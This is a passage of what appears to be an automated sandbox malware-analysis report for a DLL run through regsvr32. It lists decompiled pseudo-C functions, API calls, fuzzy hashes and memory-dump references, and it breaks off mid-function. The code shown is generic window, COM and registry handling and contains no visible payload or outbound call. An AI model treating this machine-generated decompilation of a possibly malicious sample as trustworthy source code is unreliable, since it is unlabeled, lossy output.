0x1001a5f9
0x1001a5f9
0x1001a591
0x1001a5fd
0x1001a605
0x1001a60b
0x1001a615
0x1001a615
0x1001a61b
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1001A4A5
_memset.LIBCMT ref: 1001A511

Part of subcall function 1001BDF4: _memset.LIBCMT ref: 1001BDFC

VariantClear.OLEAUT32(?), ref: 1001A551
SysFreeString.OLEAUT32(00000000), ref: 1001A5D2
SysFreeString.OLEAUT32(00000000), ref: 1001A5E1
SysFreeString.OLEAUT32(00000000), ref: 1001A5F0
VariantClear.OLEAUT32(00000000), ref: 1001A605

Part of subcall function 10019F87: __EH_prolog3.LIBCMT ref: 10019FA3
Part of subcall function 10019F87: VariantClear.OLEAUT32(?), ref: 1001A008

Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
String ID:
API String ID: 2905758408-0
Opcode ID: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
Instruction ID: ceb74f55e44ee9bcef50cea17c44e0e4c1adfe79803e4b69d5972ce8ea6398f3
Opcode Fuzzy Hash: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
Instruction Fuzzy Hash: 3551F271A006099FDB51CFA4C884BEEBBF9FF49305F104529E116EB292DB74E984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10017235 Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E10017235(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1001FBC4(E1003426F, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E1000EC55(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E1000E519();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E1001FC9C(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x1003b21c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E10020F40(_t97, _t101 - 0x48, 0, 0x20);
						E10020F40(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x1003b19c, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E10004E6E(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E10014F82(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E1000E519();
				}
				_t59 = _t98;
				goto L22;
			}

APIs

__EH_prolog3.LIBCMT ref: 1001723C
VariantClear.OLEAUT32(?), ref: 100172D2
_memset.LIBCMT ref: 1001730B
_memset.LIBCMT ref: 10017317
SysFreeString.OLEAUT32(?), ref: 1001735C
SysFreeString.OLEAUT32(?), ref: 10017366
SysFreeString.OLEAUT32(?), ref: 10017370

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
Instruction ID: 2d0dd3affd8f04fec97c60edc25b67d043c515f8611652d59fdaf26af88a8b29
Opcode Fuzzy Hash: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
Instruction Fuzzy Hash: 66414871900629EFCB01CFA4C8459DEBBB9FF08B50F10851AF529AF155C770AA82CF91

Uniqueness

Uniqueness Score: -1.00%

Function 100072BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E100072BC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10045580; // 0x771f5646
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E1001FBC4(E1003309F, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000701D(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000702E();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E1001FBB5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E1000563B(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10005500( &_v16,  *(_t100 + 0x54));
						_push(0x10037310);
						_push( &_v16);
						_push( &_v36);
						_t54 = E10007149(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E10007149(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10001260(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E100071AD(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E100071AD(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10001260( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10001260( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10044410;
						E100209E8( &_v280, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t79, 0, _t100);
						_t94 = E100105C8(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000E58E(_t94);
						}
						return E1001FC9C(_t77);
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 100072DB
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 10007397
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100073AE
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 100073C8
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100073DA

Strings

Software\, xrefs: 10007330

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
Instruction ID: 431f38651a312ef553f30843a41239907c7d8c638de5ca089e0c10656c75fbe4
Opcode Fuzzy Hash: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
Instruction Fuzzy Hash: 5C41AC35D00109AFEB11DBA4CC81AEFB7B9FF44380F50052AF555E6295DB38AA44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000A486 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000A486(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E1000EEC4(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E100069E2(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E10006DDA(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1000EF92(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E10006CF4(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E10005AC4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1000EF92(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

APIs

GetParent.USER32(00000004), ref: 1000A4B4
PeekMessageA.USER32 ref: 1000A4DB
UpdateWindow.USER32(00000004), ref: 1000A4F5
SendMessageA.USER32 ref: 1000A519
SendMessageA.USER32 ref: 1000A533
UpdateWindow.USER32(00000004), ref: 1000A579
PeekMessageA.USER32 ref: 1000A5AD

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
Instruction ID: db41b359fa61aebdb5d40a64e0a657e9155f7da8113a89a494e7da7d34e0904b
Opcode Fuzzy Hash: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
Instruction Fuzzy Hash: A3417E30604B829FF711CF258C88A1BBAF5FFCABD5F104A2DF5819606AD761D984CA52

Uniqueness

Uniqueness Score: -1.00%

Function 1000634E Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000634E(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E10005CAE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000EC09(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E1000BB9A(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E1000BB9A(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E1000BBDF(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E1000BB9A(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10044410;
						E100209E8( &_v28, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t37, _t46, _t51);
						_t43 = E100105C8(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000E58E(_t43);
						}
						return E1001FC9C(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

APIs

GetCapture.USER32 ref: 10011299
SendMessageA.USER32 ref: 100112B2
GetFocus.USER32(?,?,?,?,00000000), ref: 100112C4
SendMessageA.USER32 ref: 100112D0
GetLastActivePopup.USER32(?), ref: 100112F7
SendMessageA.USER32 ref: 10011302
SendMessageA.USER32 ref: 10011326

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
Instruction ID: 5a63e8befbd248d730497780d713f82145d505fb4d7f97fa76e00961cd780979
Opcode Fuzzy Hash: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
Instruction Fuzzy Hash: BB31057170032AAFE715EB24CC84EAF7BEEEB896C4B224579F400CB159CB31DC4196A1

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000AA1E(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E100069D9();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000EC3C(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10020F40(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000A84C(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000A96A(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

_memset.LIBCMT ref: 1000AAAB
SendMessageA.USER32 ref: 1000AAD4
GetWindowLongA.USER32 ref: 1000AAE6
GetWindowLongA.USER32 ref: 1000AAF7
SetWindowLongA.USER32 ref: 1000AB13

Strings

(, xrefs: 1000AACA

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
Instruction ID: a20b66fbb02a5be130650eb81bbfdf56ba9fafbfecf6f606b31a3a4f2e66e107
Opcode Fuzzy Hash: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
Instruction Fuzzy Hash: 7B31A1357007119FEB10DFB8C994A5EB7E8FF4A290F11062DE542A7A96DB31E840CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1001A96C Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1001A96C(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E1000A8F0(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
